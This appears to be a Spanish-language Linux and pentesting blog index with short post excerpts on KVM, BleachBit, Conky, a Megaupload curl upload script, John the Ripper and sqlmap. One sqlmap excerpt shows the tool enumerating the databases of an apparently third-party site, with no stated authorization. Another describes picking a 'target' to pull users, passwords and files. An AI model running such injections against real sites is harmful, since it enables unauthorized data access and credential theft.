Maquina virtual con KVM
Creo que para algunos que necesiten de windows, en mi caso, para hacer una que otro PoC, probar alguna herramienta para pentest, jugar solitario o buscaminas, es necesario tener una maquina virtual que nos facilite el trabajo sin tener que usar wine, playonlinux u otra aplicación que ejecute aplicaciones de dicho sistema operativo. Para esto, se recurre al uso de maquinas virtuales, que emula un PC y puede ejecutar programas como si fuese un PC real. Existen varias aplicaciones, tales como virtualbox,vmware,xen,QEMU y kvm que pueden ser utilizadas en linux para este fin. Una de las aplicaciones que es de
Bleachbit
BleachBit es una herramienta multiplataforma que nos permite realizar un borrado de datos seguro evitando dejar rastros.
Conky
Conky es un monitor de sistema ligero, cuya función principal es mostrar información de la PC en el escritorio. Conky esta licenciado bajo GPL y se ejecuta en Linux y BSD. La instalación en debian es la siguiente. # apt-get install conky Podemos configurar a gusto este monitor de texto, también podemos copiar el archivo de configuración predeterminada que nos ofrece después de haberlo instalado. En la página principal de este proyecto, podemos encontrar algunos screenshot con respectivas configuraciones click acá. La configuración se debe guardar bajo el nombre .conkyrc en nuestro directorio HOME y nuestro usario respectivo. En mi
Aplicaciones de uso habitual en la terminal.
Son muchos los que viven y mueren en la terminal, con los alucinantes comandos de Unix (?); muchas veces nos hemos topado con la idea de ejecutar las aplicaciones que están en modo gráfico en esta. Es cierto que existen un sin número de aplicaciones, pero trataré de mostrar solo algunas para el que no las conozca, empiece a utilizarlas y hacer su vida mas el33t y decirle a sus amigos que mueran de envidia por lo que ustedes hacen en linux y ellos no en wintendo xD. ¿MSN, por consola? Como se pueden imaginar si existe una aplicación para
Sqlmap Parte Final
No me aguanté y quiero seguir escribiendo sobre esta herramienta Ahora creo que se preguntarán si hay accesos a otras bases de datos, esto depende del nivel de seguridad. pero si tenemos buenos resultados, esto daría como resultado lo siguiente. panic@debian:~$ sqlmap -u http://www.sitio.cl/categorias.php?id=3 –dbs [*] starting at: 22:07:45 [22:08:24] [INFO] fetching database names [22:08:24] [INFO] fetching number of databases [22:08:24] [INFO] query: SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(10000)), CHAR(32)) FROM information_schema.SCHEMATA [22:08:24] [INFO] retrieved: 2 [22:08:39] [INFO] performed 13 queries in 15 seconds [22:08:39] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1 [22:08:39] [INFO] retrieved: information_schema [22:11:46]
Subir archivos megaupload por consola.
¿Como se usa? Primero es necesario instalar curl # apt-get install curl Se debe cambiar USERNAME y PASSWORD copiar y pegar en un archivo nuevo,llamado p ej . megabashup luego $ chmod +x megabashup para usarlo $ ./megabashup archivo a subir y nos devuelve el link de descarga #!/bin/bash referer="http://www.megaupload.com/?c=login" pag=`curl -s -e $referer -c cookiestmp.txt -F login=’1′ -F redir=’1′ -F username=’USERNAME’ -F password=’PASSWORD’ -L http://www.megaupload.com/?c=login` pag=`curl -s -b cookiestmp.txt http://www.megaupload.com | grep ‘ url=`echo $pag | cut -f1 -d?` id=`echo $pag | cut -f2 -d? | cut -f2 -d=` download=`curl -s -b cookiestmp.txt -A ‘Mozilla/4.0 (compatible; MSIE 6.0; Windows
Sqlmap parte I
Sqlmap es una “open source penetration testing tool” creada para automatizar sql inyeccion. Con esta podemos sacar usuarios, contraseñas, consultar en tablas y las columnas, hacer modificaciones en tablas y las columnas, leer archivos del sistema de archivos, etc. Obviamente todo lo que se pueda hacer con esta herramienta, depende 100% de la seguridad en de la web que se va aplicar esta herramienta. La instalación en debian es la siguiente. # apt-get instal sqlmap Ahora bien buscamos un “target” para hacer las pruebas que corresponda de esta herramienta.
John The Ripper.
John the Ripper es un programa de criptografía que aplica fuerza bruta para descifrar contraseñas. Es capaz de romper varios algoritmos de cifrado o hash, como DES, SHA-1 y otros. John the Ripper es capaz de autodetectar el tipo de cifrado de entre muchos disponibles, y se puede personalizar su algoritmo de prueba de contraseñas, eso ha hecho que sea uno de los más usados en este campo. Uno de esos caso, es el crack de hash md5 muy comunes en linux.
EasyTAG
Un editor de ID’s de Mp3, para dejarlos mas limpios y libre de Spam. apt-get install easyTAG Es fácil de utilizar, Enjoy!
